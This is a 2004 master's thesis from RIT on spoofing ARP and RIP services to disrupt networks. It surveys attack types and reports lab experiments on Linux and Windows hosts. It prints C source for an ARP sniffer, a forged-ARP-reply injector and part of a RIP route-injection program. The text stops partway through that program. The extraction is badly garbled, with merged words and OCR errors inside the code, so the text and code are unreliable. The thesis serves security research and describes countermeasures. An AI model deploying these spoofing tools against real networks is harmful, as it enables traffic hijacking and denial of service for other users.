Rochester Institute of Technology
RIT Scholar Works
Theses
Thesis/Dissertation Collections
2004
Network Disruption by Spoofing Service Attacks
Yadasiri Lertlit
Follow this and additional works at:
http://scholarworks.rit.edu/theses
This Thesis is brought to you for free and open access by the Thesis/Dissertation Collections at RIT Scholar Works. It has been accepted for inclusion
in Theses by an authorized administrator of RIT Scholar Works. For more information, please contact
ritscholarworks@rit.edu.
Recommended Citation
Rochester Institute
ofTechnology
Department
ofInformation
Technology
Master
of
Science in Information
Technology
Thesis
Network
Disruption
by
Spoofing
Service Attacks
by
Yadasiri Lertlit
Committee Chair
Prof. Pete Lutz
Committee Members
Prof. Jim Leone
Thesis Reproduction Permission Form
Rochester Institute of Technology
B. Thomas Golisano College
of
Computing and Information Sciences
Master of Science in Information Technology
Network Disruption by Spoofing Service Attacks
I, Yadasiri Lertlit, hereby grant permission to the Wallace Library of the
Rochester Institute of Technology to reproduce my thesis in whole or in part.
Any reproduction must not be for commercial use or profit.
Rochester Institute of Technology
B. Thomas Golisano College
of
Computing and Information Sciences
Master of Science in Information Technology
Thesis Approval Form
Student Name:
Yadasiri Lertlit
Project Title:
Network Disruption by Spoofing Service Attacks
Name
Peter H. Lutz, Ph.D
Chair
Jim Leone, Ph.D
Committee Member
Charlie Border, Ph.D
Committee Member
Thesis Committee
Abstract
It is clearly
evident asthe
Internet
continuesto
growthat
it
has become
aprominent
and
dependable
sourcefor
information,
andtool
for business-use.
Our
dependence
onthe
Internet
makesit
criticalto
be
ableto
distinguish between
whichtypes
of
attacks
it
can withstand andthe
types
of attacksthat
willdisable
the
network.Moreover,
the
understanding
ofthe
areas ofvulnerability
ofthe
different
types
ofnetworks will
help
find
means ofmaking it
more securein
the
future.
With
the
existence of variousforms
of attacks againstthe network,
networkdevelopment
shouldlook
ahead and strengthenthe
networkto
be
ableto
manageitself
under
these
intrusions.
One
type
ofthese
attacksis spoofing
networkservices,
wherethe
attack will
impersonate
alegitimate
service provider and underminethe
trust-based
relationship between
the
legitimate
service provider andthe
machinesin
the
system.Network
servicesthat
willbe involved
areAddress Resolution Protocol
Spoofing,
Routing
Information Protocol
Spoofing,
andDynamic Host
Configuration Protocol.
This
paper will explainthe
different
classifications
of networkattacks
and
describe how
network servicespoofing
attack effectthe
network.Various
platforms
willbe
exploredto
determine how
they
perform under similar networkservice
spoofing
Acknowledgments
I
wouldlike
to thank
Prof. Pete
Lutz,
whois my dissertation
committee
chair,
for
his
guidance,
encouragement,
and patience.His
insight,
knowledge,
and researchmethodology
wereinspirational
andI have learned
a greatdeal
from his
valuable advices.Many
thanks
must also goto
Prof.
Jim Leone
andProf. Charlie Border for serving
onmy
defense
committee.Many
other peoplehave
indirectly
contributedto this thesis:
my
professors and
my friends. Though I
cannotlist
out alltheir names,
I
mustthank them
for
their
faith,
whichhelped
methrough
any difficulties
that
I
mighthave
experienced.Finally,
specialthanks to
my
parents and sister.Everything
meaningfulin my life
Table
of
Content
Abstract
Acknowledgements
Chapter
1: Introduction
Chapter
2:
Taxonomy
2.1 Network
Security
Issues
2.2 Types
ofAttacks
2.2.1 Attacks Classification
by
Layers
2.2.2 Attacks Classification
by
Characteristic
2.2.3 Attacks Classification
by
Effect
Chapter 3:
Spoofing
Services
Attacks
3.1 Address Resolution Protocol
3.1.1 Background Information
3.1.2 Experiment
andResults
3.2
Routing
Information Protocol
3.2.1 Background Information
3.2.2 Experiment
andResults
3.3 Dynamic Host Configuration Protocol
3.3.1 Background Information
3.3.2 Experiment
andResults
Chapter
4:
Conclusion
Chapter 1:
Introduction
Computer networking
was established andhad
progressedthis
far owing entirely
to
human ingenuity. We
ought
to
have
a completeunderstanding
ofit;
but from
the
late
1990s
to this
presentday,
we are stilldriven
for
abetter grasp
ofit.
The Internet is
vast and complex.This
providesmany difficulties in
maintaining
network security.
Internet
traffic
is incomprehensible
to
govern andtrack.
Various
internet
traffics traverse through
dissimilary
administrated networks.As
the
Internet
continues
to
grow at avery
rapidpace, the
range ofwidely dissimilar
applications areintroduced
to the
network.We
created guidelines ofhow
network protocols areto
performbut
there
areinfinite
possibilitiesleft irresolute. This is
unacceptable whenthe
Internet has already
claimed a prominent place
in
modernlife. How
will one system platform communicatewith another platform?
How
will a network service manage underdifferent IP
versions?How
will atrust-based
protocol manage over malicious attacks?Various
known
attacks canbe
categorizedin
different
ways:Classification
by
Layers
Classification
by
Characteristic
Computer security
aimsto
strengthenthe
network'sconfidentiality,
integrity,
andavailability.
Knowledegable
attackers
can performspoofing
attacks
for diversified
reasons
to
disrupt
computersecurity
such as:Eavesdrop
on a communicationHijack
a communicationPrevent
anindividual
from
being
servicedPrevent
available
serviceto the
networkDisrupt
the
networkfrom
functioning
It is
criticalto
understand wherethings
fail
andthe
characteristics of possible attacksin
order
to
eliminatethe
weaknesses ofthe
Internet Protocol
suite of protocols.Growing
concernfor security has
createdthe
design
ofNetwork
Security
Tools.
These
tools
have been known
to
be
groupedinto 4
simple classes(Schiffman). The
classes
have been
termed:
Active
Reconnaissance,
Passive
Reconnaissance,
Attack
andPenetration,
andDefensive.
Active
Reconnaissance
andPassive
Reconnaissance
providethe
meansfor
collecting information
aboutthe
network.Active Reconnaissance
tends
to
be
moreaggressive
than
Passive Reconaissance
and collectsinformation
from
injecting
networkpackets
into
the
network andlistening
in for
responses.Port
Scanning
andIP
Expiry
areways
to
performActive Reconnaissance. Passive Reconnaissance is
aless
aggressive
form
ofinformation
gathering.It
waitsto
collectdata
withoutinterfering
withthe
Penetration is
aforceful way
oftaking
advantages ofthe
weaknesses ofthe
network.This
group includes
Vulnerability Scanning
andVulnerability
Testing. Defensive
type tools
oppose possible attacks
to the
network and assist networkadministration.
Such
tools
involve Intrusion
Detection, Firewalling,
andEncryption.
Intrusion Detection
methodsdesigned
are:Autonomous Distributed
Probing,
Source-Initiated
Distributed
Probing,
andChapter 2:
Taxonomy
2.1
Network
Security
Issues
The
Internet
Protocol
wasestablished
through
atrust-based
conceptfor
communication.
This
means
that
information
transfer
is
vulnerableto
attackfrom
aknowledgeable intruder in
variouslevels. It is
criticalto
understand where attacks occurand
the
characteristics
of possible attacksto
eliminatethe
weaknesses ofthe
Internet
Protocol
suite of protocols.Internet Protocol
The Internet Protocol is
anOSI Model Network Layer
protocolthat
governshow
the
packettravels
in
the
network.It is
aconnection-less
type
of communication andutilizes
the
idea
ofbest-effort
packetdelivery
through
the
network.The IP Packet
Format:
Version
IP Header Length
Type-of-Service
Identification
Time-to-Live
Protocol
Source
Address
Destination Address
Options
Data
Total Length
Flag
Fragment Offset
Header Checksum
The Transmission Control Protocol is
anOSI Model
Transport
Layer (Layer
4)
protocol
that
providesdifferent
servicesto
the
flow
ofthe
transfer.
It is
aconnection-oriented
type
ofcommunication
andit
establishesthe
communication with reliableend-to-end
packetdelivery
through
the
network.Such
a connectionis
performedusing
the
"three-way
handshake" method.TCP
organizesthe
unstructured stream ofdata
transferred
with sequence numbers.It
sequencesthe
nextbyte
that the
sourceis
expectedto
receivefrom
the
destination
by
providing
an acknowledgment numberto
the
destination. The TCP Packet Format:
Source Port
Destination Port
Sequence Number
Acknowledgment
Number
Data Offset
Reserved
Flags
Window
Checksum
Urgent Pointer
Options
Data
Packets
Hosts
on a network communicateto
each other via packets.Packets
containfields
such as
the
sourcehost
andthe
destination
host
ofthe
packet,
andthe
packet content.In
this
paper,
packets willbe
illegitimately
madeto
spoof as network service packets orAuthentication
Authentication
is
the
process ofverifying
ahost's
or asystem's
identity
in
a communication.This
paper will underminethe
authentication process with spoofed packets anddemonstrate how
authenticationis
not strengthenedby
the
IP
version used.Encryption
Encryption is
the
process ofproducing
ciphertext
from
plaintext to
prevent others exceptthe
participantsfrom understanding
the
message.Encryption
canbe
usedas a countermeasurefor
attacksthat
attemptto
spoof packets.Broadcast
Broadcasting
lets
allhosts
onthe
network receivethe
packet.This is
done
by
setting
the
destination MAC
address ofthe
packetto
FF:FF:FF:FF:FF:FF.
Sniffing
Sniffing
is
an act ofmonitoring
the
networkfor
transferring
data,
capturing
packets and
reading
the
packetcontents,
whetherlegitimately
orillegitimately.
Due
to the
fact
that the
Network Layer
ofthe
Internet Protocol
utilizesInternet
addresses
for identification
andis
notvery
strict onauthentication,
a malicioushost
canclaim an
Internet
addressthat
does
notbelong
to
it
and underminethe trust
ofthe
connection
by
pretending
to
be
anotherhost in
the
network.2.2 Types
of
Attacks
Since
the
early popularity
ofthe
Internet,
many have
exploredthe
aspect ofits
security
andthe
functionalities
ofdifferent
possible attacks andtheir
effects onthe
network.
Various
approaches existin
the
classifications of networkintrusions.
One
type
of classificationis
by
the
characteristic ofthe
attacks.This
pinpointsthe
main operation ofthe
attack;
whetherthe
attackis mainly
abuffer
overflow attacktype
orbrute-force
attacktype,
for
example.The
major problem withthis
method ofclassification
is
that
different
attacks canhave
morethan
one characteristicthat
they
fall
under.
Known
attackshave
alsobeen
characterizedby
the
Open System Interconnection
(OSI)
Layers
at whichthey
occur:Physical,
Data
Link, Network, Transport, Session,
Presentation,
orApplication.
One
concernto
this
approachis
that
some attacks areconcentrated
in
the
Network
andTransport Layers but
are unableto
be
completely
Classification
ofattacks
by
effect separatesthe
networkhostilities
by
whatthey
accomplish or violate.
An
attack canhave
effects such asEavesdropping, Hijacking,
Denial
ofService,
orNetwork Disruption.
With
such an approachit is
essentialto
have
experimental results showthe
"effects"
of
the
attacksto
be
ableto
separatethem
into
specific groupings.Different
network
threats
canbe distinguished in
various ways and a certain attack canfall
undermore
than
one categories.Active
orPassive
Attacks
that
are active requirethe
attackerto take
actionin causing it
to
happen,
by
means ofrunning
programsfor
example.Passive
attacksdo
not requiresuch actionsto
bring
it
forth
by
the
attacker(Andress, Cox,
Tittel).
Network Service
Spoofing
attacksthat
willbe
addressedin
this
paper willtempt to
disrupt
the
network withActive Attacks.
External
orInternal
External
attacks
are attacksto
the
networkthat
originatedfrom
outsidethe
network.
Internal
attacks originatefrom inside
the
networkthat
is
being
attacked.Network
Service
Spoofing
attacksthat
willbe
addressedin
this
paper willbe internal
Front door
orBack
door
Front door
attacks crackthe
authentication processes anddisguises
the
attacker asa
legitimate
user ofthe
network.Back door
attacks goes aroundthe
authentication
process
to
be let inside
the
network withoutany
authentication.Direct
orIndirect
Direct
attacks attemptto
gain accessto the
systemby directly
connecting
to the
network,
by
running
scriptsto
guessthe
passwordsfor
example.Indirect
attacks attemptto
gainaccess
by
means of socialengineering
ordumpster
diving
for
example.2.2.1
Attacks Classification
by
Layers
Layer 7 Attacks
These
attacks occur atthe
Application Layer
ofthe
OSI
model.For
example,
Simple Mail Transport Protocol
(SMTP),
File Transfer Protocol
(FTP),
andSimple
Network Management Protocol
(SNMP)
attacks.These
attacks
occur atthe
Session Layer
ofthe
OSI
model.For
example, the
Domain Name System
(DNS)
attacks
andNetBIOS
Win Nuke.
Layer 3/4 Attacks
These
attacks occur atthe
Network
andthe
Transport
Layers
ofthe
OSI
model.For
example,
TCP SYN
flooding,
Smurf
attack,
andDenial-of-Service
attacks.2.2.2
Attacks
Classification
by
Characteristic
Man-in-the-Middle Attack
This
attackis
aconfidentiality breach. The
attackeris
situatedin
the
path ofcommunication and
is
ableto
intercept
packetsintended for
the
other end ofthe
communication.
o
Session
Hijacking
This
type
of man-in-the-middle attacklets
the
attackertake
control overthe
communicating
systemsby
intercepting
packetsintended for
adifferent
destination
anddisguising
the
reply
asif
the
attacker werethe
intended
Teardrop
Attacks
This
type
of attackdefeats
the
Internet Protocol
by forming
a packetin
amalicious
way
suchthat
whenthe
Internet Protocol
willhave difficulties
disassembling
the
packet uponreception, the
receiving host
willcrashfrom
the
confusion.o
Smurf
Smurf
attacks underminethe
Internet Control
Message Protocol
processby
sending
out maliciousICMP ping
requests.This ICMP ping
requestis
sent as abroadcast
andis designed
to trigger
ICMP ping
responsefrom
allthe
hosts
onthe
network
to target the
victim.If
the
attacker sends out moreICMP ping
requeststhan the
victimcanhandle,
the
victimwillbe flooded
by
everyone onthe
networkand can
possibly
crash.Brute-force
Attacks
This
laborious
mean of attackis
wherethe
attacker attemptsto
figure
outthe
victim's password.
The
attacker pursuesthis
by
trail
anderror,
compiling
all possiblecombinations of
characters
andletters.
The
attackerattempts
to
crackthe
passwordusing
wordsfrom
adictionary
or
list
of popular words.Denial-of-Service
DoS
attacks aimto
disable
ahost
by
sending
moretraffic
than the
host
canhandle
or respond
to,
depleting
up
the
host's
resources andrendering
the
host
unableto
servicelegitimate hosts. Packet
filtering
can serve as a possible solutionto
someDoS
attacks.o
Buffer Overflow
This DoS
attack aimsto
flood
the
application'sbuffer
onthe
host
that
is
under attack with more
data
then
it
wasdesigned
to
handle. Once
the
buffer limit
is
exceeded, the
applicationmay
crash entirely.o
TCP SYN Attacks
In
TCP
communication,
SYN
packets are acknowlegded withcorresponding
ACK
packets.When
flooded
withSYN
packets withoutcorresponding ACK
packets,
the
attackersucceeeds
in creating
multiplehalf-opened
connection
and open multiple portssimultaneously.
The
host
that
is
being
flooded
wouldbe
overwhelmed and would notbe
availableto
servicelegitimate
o
Ping
ofDeath
Ping
ofDeath
attackis designed
to
crash a victimby
causing
abuffer
overflow.
The
attacker sends out packetsdesigned
sothat
whenthe
victimreceives
them,
the
packets are reassembledto
an over-sized packet of morethan
65,536 bytes
onthe
victim's side.o
Land Attacks
Land Attacks is
wherethe
attacker sends out a malicious packet withthe
same
IP
address,
source anddestination
ports ofthe
victim's and sendsthis
packetout
to the
victim.Upon
reception,
the
victim willbe
occupiedin
aninfinite
loop
by
communicating
to
itself,
causing
an overload and possible crash.Flooding
Flooding
attackssimply direct
massiveamounts of packetsdirected
to
ahost. This
will give
the
host
difficulties
to
coping
withthe traffic
andultimately lead
to
packetloss,
whether
the
packets are malicious orlegitimate.
o
Non-Blind
Spoofing
Non-Blind
Spoofing
is
whenthe
attackertampers
with a packetthat
is
onthe
same network asthe
victim.o
Blind
Spoofing
Blind
Spoofing
is
whenthe
attackertampers
with a packetthat
is
destinated
outsidethe
attacker's network.This
type
ofspoofing is
moredifficult
than
Non-Blind spoofing because
the
victimis
not situated onthe
same networkas
the
attacker.2.2.3
Attacks Classification
by
Effect
Eavesdrop
Eavesdropping
is
an attackto the
confidentiality
ofthe
connection.The
path ofthe
connectionis
notbroken
but
the
legitimate
source anddestination
ofthe
communication
is
unaware ofthe
attacker.(Keung)
Hijacking
Hijacking
is
wherethe
sessionis
taken
overby
the
attacker and alegitimate party
The
session
is
carried out sothat
the true
destination
ofthe
communicationhas
noknowledge
ofthe
session.(Lail)
Denial-of-Service
Denial-of-service
attacks render ahost
or a machineto
be
unableto
provideservice whether
it is due
to the
fact
that
it has
crashedentirely
orsimply
overusedits
bandwidth in
the
attack(Knipp
et al.).This
paper willdemonstrate
that
ARP
Spoofing
attack can
be
aDenial-of-Service
type
attack.Network
Poisoning
This
type
of attack"poisons"
the
network and rendersit
unableto
workefficiently
or manipulates
the
networkto
wreckby
proprogating
the
attackthrough
more points ofthe
network.This
paper willdemonstrate
that
RIP
Spoofing
attack canhave
the
effect ofChapter 3:
Spoofing
Services
Attacks
Attacks in
the
pasthave been devised
to
harm
a singlehost
orclient
and notto
damage
a router orthe
network as a whole.Hence,
it is
stillquestionable
whetherthe
outcome
of such an attack wouldtake
avery
noticeableturn.
3.1
Address
Resolution Protocol
(ARP)
3.1.1 Background Information
ARP is
a method ofmapping IP
addressesto
MAC
addresses.It
makesit
possiblefor hosts
to
locate
one another onthe
network.It
allows
for
ahost
to
broadcast
andfind
ahost
by
sending
outARP
request packets andfor
ahost
to
answerto
abroadcast
to
let
others
know
whereit is
by
sending
outARP reply
packets.Without
ARP,
the
local
areanetwork would cease
to
function because hosts
would notknow
ofany
otherhosts
existing
onthe
networkother
than themselves.
In
anideal
network,
allhosts in
the
local
areanetwork should
be
ableto
ping
eachother successfully.
The
pinger willhave
the
validARP
record ofthe
machinethat
it has
With ARP
spoofing,
amachine
impersonating
alllegitimate
hosts
will attemptto
manipulate
the
networkto
cease working.It
will striveto
answer all ofthe
incoming
ARP
request
packets withfalse ARP
response packetsbefore
anauthentic
host
can.3.1.2 Experiment
andResults
The
experimentinvolves
an attacker(a Linux
machine)
and4 host
machines(Figure 1).
attacker
Linux
Win2000
WinXP Win98Figure
1: ARP spoofing
attack networkset-up
The 4
host
machines rundifferent OSes: Red Hat
Linux,
Windows
XP,
Windows
2000,
andWindows 98. The
purpose ofthe
attackeris
to
run a scriptthat
repliesto
any
ARP Request
packet withfaulty
ARP
Reply
packets.The ARP Request
will say:Whose
MAC
addressdoes
this
IP
addressbelong
to?
The
faulty
ARP
Reply
will say:That IP
address
belongs
to
attacker'sMAC
address.The intended
outcome of such an attackis
to
supposedly hijack
allthe
traffic
ofthe network,
or atleast disrupt
communicationsbetween
the
hosts.
The
script usedin
this
experimentconstantly
sniffsthe traffic
for ARP
Request
what
IP
address
and
MAC
addressinitiated
the
ping
and whatLP
address
is
the
ping
destined
to.
The
scriptthen
generates a specificARP
Reply
to
map
the
IP
address with anarbitrary
MAC
addressfor
eachARP Request
packetsit intercepts. This ARP
Reply
is
injected
outto the
network.ARP
Packet Capture Script
#include
<stdio.h>#include
<stdlib.h>#include
<pcap.h>#include
<errno.h>#include
<sys/socket.h>#include
<netinet/in.h>#include
<arpa/inet.h>#include
<netinet/if_ether.h>#include
<netinet/ip.h>#include
<net/ethernet.h>int
main(intargc,char**argv)
{
inti;
int
counter=0;char
*dev;
char
*net;
char
errbuf[PCAP_ERRBUF_SIZE];
pcap_t*
descr;
u_char
*packet;
/*
Packet header
structure
in
pcap.h*/
struct pcap_pkthdr
hdr;
/*
Ethernet header
structurein
net/ethernet.h
*/
struct etherjieader
*eptr;
/*
Pointer
for printing
outhardware
header info */
u_char*ptr;
setbuf(stdout,0);
dev
=pcap_lookupdev(errbuf);
printf("DEV:
%s\n",dev);
/*
do{
/*
Starting loop
tosniffthenetworkand
filters
outonly
theARP
typepackets*/do{
descr
=pcap_open_live(dev,BUFSlZ,0,-l,errbuf);packet=
(u_char
*)pcap_next(descr,&hdr);
/*the
ether
header */
eptr=
(struct
etherjheader*)
packet;}while(ntohs
(eptr->ether_type) !=ETHERTYPE_ARP);
/*
Printing
outputtodisplay
theARP
packetthathas been
sniffed*/printf(
"\n\n%d
!\n",counter+
1
)
;printf("Captured packet
length:
%d\n",hdr.len);
printf("Received:
%s\n",ctime((const time_t*)&hdr.ts.tv_sec));
printf("Ethernet address
length:
%d\n",ETHER_HDR_LEN);
printf(
"Ethernet
typehex:%x dec:%d is
anARP
packet\n",
ntohs(eptr->ether_type)
,ntohs(eptr->ether_type));
/*
Printing
outputtodisplay
theSource
andtheDestination IP
address oftheARP
packetthathas been
sniffed*/printf("
Source IP At
%d.%d.%d.%d\n",packet[28],packet[29],packet[30],packet[31]);
printf("
Dest IP:\t
%d.%d.%d.%d\n",packet[38],packet[39],packet[40],packet[41]);
ptr=
eptr->ether_shost;
i
=ETHER_ADDR_LEN;
printf("
Src
AddressAt");
do{
printf("%s%x",(i==ETHER_ADDR_LEN) ?
"" :":",*ptr++);
}while(-i>0);
printf("\n");ptr=
eptr->ether_dhost;
i
=ETHER_ADDR_LEN;
printf("
Dst
AddressAt");
do{
printf("%s%x",(i==ETHER_ADDR_LEN) ?
" " :":",*ptr++);
}while(-i>0);
printf("\n"); counter++;return
0;
ARP
Reply
Packet Injection
Script
#include
<stdio.h>#include
<stdlib.h>#include
<libnet.h>#include
<pcap.h>#include
<errno.h>#include
<sys/socket.h>#include
<netinet/in.h>#include
<arpa/inet.h>#include
<netinet/if_ether.h>#include
<netinet/ip.h>#include
<net/ethernet.h>#define ETHERTYPE_IP
0x0800
#define ETHERTYPE_ARP
0x0806
/*
Defining
thehardcoded
Ethernet Source
andDestination
addressesfor
theARP
Reply
Packet */
u_char
enet_src[6]
={
0x00, OxeO, 0x29, 0x08, OxeO,
0x58
};
u_char
enet_dst[6]
={
0x30, 0x31, 0x32, 0x33, 0x34,
0x35
};
int
main(intargc,char**argv)
{
int
i;
int
counter;libnet_t
*1;
libnet_ptag_t
x;u_char
src_ip[4]
={
1,1,1,1
};
u_char
dst_ip[4]
={
2, 2, 2,
2
};
char
*dev;
char
*net;
char
errbuf[PCAP_ERRBUF_SIZE];
pcap_t*
descr;
u_char
*packet;
/*
Packet header
structurein
pcap.h
*/
struct pcap_pkthdr
hdr;
/*
Ethernet header
structurein
net/ethernet.h*/
/*
ARP
header
structure
in
net/ethernet.h*/
structlibnet_arp_hdr
*aptr;
/*
Pointer
for printing
outhardware
header info
to thedisplay*/
u_char
*ptr;
setbuf(stdout,0);
dev
=pcap_lookupdev(errbuf); printf("DEV:%s\n",dev);
/*
Starting
loop
tosniffthenetworkuntilthe
device interface is disabled */
do{
/*
Starting
loop
to
sniffthenetworkand
filters
outonly
theARP Request
typepackets*/do{
descr
=pcap_open_live(dev,BUFSIZ,0,-l,errbuf); packet=(u_char
*)pcap_next(descr,&hdr);
eptr=
(struct libnet_ethernet_hdr
*)
packet; aptr=(struct libnet_arp_hdr
*)(packet
+14);
}while(ntohs(eptr->ether_type)
!=ETHERTYPE_ARP
||
ntohs(aptr->ar_op)
!=ARPOP_REQUEST);
/*
Printing
outputto
display
theARP
packetthathas been
sniffed*/printf(
"Captured
packetlength:
%d\n",hdr.len);
printf("Received:
%s\n",ctime((consttime_t*)&hdr.ts.tv_sec));
printf("ARP opcode:
%x\n",ntohs(aptr->ar_op));
printf("Ethernet address
length:
%d\n",ETHER_HDR_LEN);
printf(
"Ethernet
type
hex:%x dec:%d is
anARP
packet\n",ntohs(eptr->ether_type)
,ntohs(eptr->ether_type))
;/*
Printing
outputtodisplay
theSource
andtheDestination IP
address oftheARP
packetthathas been
sniffed*/printf("
Source IP At
%d.%d.%d.%d\n",packet[28],packet[29],packet[30],packet[31]);
printf("
Dest IPAt
%d.%d.%d.%d\n",packet[38],packet[39],packet[40],packet[41]);
ptr=eptr->ether_shost;
i
=ETHER_ADDR_LEN;
printf("
Src
AddressAt");
do{
printf("%s%x",(i==
ETHER_ADDR_LEN)
?
"":
":",*ptr++);
printf("\n");
ptr=
eptr->ether_dhost;
i
=ETHER_ADDR_LEN;
printf("
Dst
AddressAt");
do{
printf("%s%x",(i==
ETHER_ADDR_LEN)
?
"":
":",*ptr++);
}while(-i>0);
printf("\n");
counter=
0;
i
=ETHER_ADDR_LEN;
ptr=eptr->ether_shost;
do{
enet_dst[counter]=*ptr++;
counter++;}while(-i>0);
/*
Makes
thesourceIP
address ofthe
ARP Request
goes out asdestination IP
address oftheARP
Reply
*/
dst_ip[0]=packet[28]
dst_ip[l]=packet[29]
dst_ip[2]=packet[30]
dst_ip[3]=packet[31]
/*
Makes
thedestination IP
address ofthe
ARP Request
goesout as sourceIP
address oftheARP
Reply
*/
src_ip[0]=packet[38]
src_ip[l]=packet[39]
src_ip[2]=packet[40]
src_ip[3]=packet[41]
/*
Forming
theARP
Reply
packet*/
1
=libnet_init(LIBNET_LINK, NULL,
errbuf);
x=
LIBNET_PTAG_INITIALIZER;
x=
libnet_build_ethernet(
enet_dst,
enet_src,
ETHERTYPE_ARP,
NULL,
0,
1,
0);
/*
Injecting
theARP
Reply
packet outto thenetwork*/
libnet_write(l);
libnet_destroy(l);
}while(dev
!=NULL);
return
0;
}
To study how
the
ARP
Reply
is
received on ahost,
abatch
file is
generated onthat
host. This batch
script calls outthe
ARP
entriesin
that
host's ARP
table
in
aloop
for
the
extent ofthe
ping.First,
the
hosts
are setup
andthe
ARP
tables
on eachhost
are cleared.The
attacking
scriptis
started onthe
attacking host. The batch
scriptis
started onthe
pingging
host
orthe
victim.The
attack starts when ahost
attemptsto
ping
anotherhost. The ARP
Request is
senthere. The
attacker,
being
onthe
samenetwork,
will receivethe
broadcast
and
intercept
the
ARP
process.Results from
this
experiment showconsistency from
the
pings.
Linux
asthe
Pinger
When
the
Linux
machine pingsthe
other machinesin
the
network,
it
refusesthe
pinging.
Moreover,
the
ping is
successful andthe
correctMAC
addressis
registeredin
the
Linux
machine'sARP
table.
Windows XP
asthe
Pinger
When
Windows XP
pingsthe
other machinesin
the
network with noARP
entriesin its ARP table,
results showthat
the
ping
willfail
with aRequest
timed
outif it
pings
to
anotherWindows
machine.ARP
tables
will showthat the
attacker's
MAC
address
has successfully deceived
the
pinging
machine.On
the
contrary,
whenWindows XP
pingsto
Linux
machinesin
the
network withno
ARP
entriesin its ARP table,
results showthat the
ping
willbe
successful.And
the
ARP
table
will registerthe
correctMAC
address ofthe
Linux
machines.Windows 2000
asthe
Pinger
When Windows 2000 does
the ping, the
results are similar asthe
Windows XP
asthe
Pinger.
Windows 98
asthe
Pinger
When Windows 98 does
the
ping,
the
results are similar asthe
Windows XP
asthe
Pinger.
This
showsthat the
integrity
is better
onRed Hat Linux
machinesthan
Windows
tables
on
the
Windows
machines willdemonstrate
that
the
attacker's
MAC
addresshas
corrupted
the
ARP
tables
for
abrief
momentbut it
willconvertback
to the
correctMAC
address
ofthe
Linux
machine.Unlike
the
Linux
machine,
whenWindows OS
machinesare
pinged,
the
attacker'sMAC
addressinfiltrates
the
ARP
tables
of otherWindows OS
machines'
ARP
tables
and staysin
the
ARP
tables.
This
experiment also provesthat the
faulty
ARP
repliesdestined
to the
pinger willnot affect
the
otherhosts
onthe
network.So
the
numberof victimis limited
to the
pinger and notthe
entire network.As
one machine pings another machinein
the network,
communicationbetween
the two
is
not recordedby
the
other machinesexisting
onthe
same network.The
othermachines'
ARP
tables
do
not registerthe
pings orthe
ping
responses unless
they
areinvolved
directly
in
the
pings.This
is due
to the
nature ofthe
ARP
process.The ARP Request is
abroadcast
type
packetdestined
to
allhosts
onthe
local
area network.The ARP
Reply
is
notabroadcast
type
packet andit is destined solely
for
the
sourceofthe
ARP Request
to
intercept.
This
type
ofARP
attack provesto
have
anotherhindrance
to the
network ofWindows
OS
machines.Machines
that
have statically
configuredIP
addresses cannotstart
up
onthe
network withthis type
of attackeralready existing
onthe
samesubnet.The
Windows
OS
host has
a
heuristic for ARP
which willdetect
a conflictin
IP
for any IP it
is
statically
configuredto
have
andit
willdisable its
owninterface (Figure 2).
Thus,
this
The
systemhas detected
a conflictfor IP
address100.141.142.143
withthe
systemhaving
hardware
address00:E0:29:08:E0:58. The interface has been disabled.
:;/; ...
Figure 2: ARP spoofing
attackIP
conflict onWindows
OS
machines
There
have been 4
possiblemethods
for securing ARP-related
attacks
proposed(Ye). First strategy is Static ARP Caching. This
willimploy
the
useof static
ARP
entries.No
dynamic
entries canalter
the
cache.
Dynamic ARP
Caching
is
anotherstrategy.
This
method
willinvolve
a
centralizedARP
server and
still providesthe
feature
ofdynamic
ARP.
Smart hubs
and switches
is
anotherstrategy
which will makeARP-related
attacks
more
detectable.
Lastly,
Anti-IP-address spoofing
withina
LAN
canbe
performedas
another strategy.
This is
possiblebecause ARP-related
attacks will requireIP spoofing
to
make
it
possible.3.2
Routing
Information Protocol
(RIP)
3.2.1 Background Information
RIP is
a
method
for dynamic routing for
a
network.It
makesit
possible
for
accomplishes
this
by having
routers onthe
network generaterouting information in
aRIP
packet and
sending
the
RIP
packet outthe
router'sinterfaces. This information is
usedby
routers
to
learn
aboutdistant
subnets
andto
decide
onthe
best
nexthop
in reaching
those
subnets.
The
metricRIP
usesto
determine
the
best
routefor
a packetto
traverse
through
the
networkis
hop
count.Hop
countis
the
number of routersconnecting
the
path.A
smaller
hop
countis
preferredto
alarger
hop
count.A
metric of1 is
the
best
possiblemetric.
A
metric of16 is
infinity
andit determines
an unreachable subnet.A
metric of0
refers
to
adead
route.With
RIP
servicespoofing,
illegitimate
routing
updateinformation
is
sentthroughout the
network.It
willmodify routing
tables
of routersin
the
network withinaccurate
entries.3.2.2 Experiment
andResults
Currently
there
areRIP
version1
andRIP
version2. RIP
version2 has
moreoptions such as
authentication.
For
this thesis
experiment,
RIP
version2 is
usedbecause
it is
anadvancement
of version1
andit
is
more up-to-date.RIP
runs overUDP
andutilizes source port of
520
anddestination
port of520. The IP
version usedfor
this
Hat Linux for
the
attacker andWindows XP for
the
hosts. The
routers
used areCisco
2500 Series
routers.The
script usedin
this
experiment
is
specifically
usedto
generate aRIP
advertisement
packet,
whichbroadcasts
a route of1 for
a particular subnet onthe
network.
When
the
attackerexecutes
this script, the
attacker will appearto
behave
asthough
it
were aRIP
router.It is intended
that the
routerdirectly
connected
to the
attacker will receive
this
packet and understandthat the
subnetthe
attackeris advertising
is
connectedto
oneinterface
whilethe
actual subnetis
connectedto
its
otherinterface.
RIP Packet Injection
Script
#include
<stdio.h>#include
<stdlib.h>#include
<libnet.h>#include
<errno.h>#include
<sys/socket.h>#include
<netinet/in.h>#include
<arpa/inet.h>#include
<netinet/if_ether.h>/*
Defining
thehardcoded
Ethernet Source
andEthernet Multicast
addressesfor
theRIP Packet */
u_char
enet_multicast[6]
={
0x01, 0x00, 0x5e, 0x00, 0x00,
0x09
)
u_char
enet_src[6]
={
0x00, 0x10, 0x7b, 0x38, Oxld,
0x64
};
int
main()
{
libnet_t
*1;
char
errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t
x;/*
Defining
the
hardcoded
EP routing
subnet,
IP
Source,
IP
Multicast,
and nexthop
addressesfor
theRIP
Packet
*/
ujong src_ip[4]
={
100, 21, 2,
0
};
ujong spoof_srcip[4]={
100,21,
1,2
};
u_long
spoof_src_ip;ujong
dst_ip[4]
={
224,
0, 0,
9
};
u_long
long_dst_ip;
ujong
next_hop[4]
={
0, 0, 0,
0
};
u_long
long_next_hop;
/*
Defining
thehardcoded
networkmask,portnumber,andthepayload
for
theREP Packet */
ujong
netmask[4]
={
255, 255, 255,
0
};
ujong
long_netmask;
u_short rd=
0;
u_short port=520;
char*payload;
payload=
NULL;
setbuf(stdout,0);
1
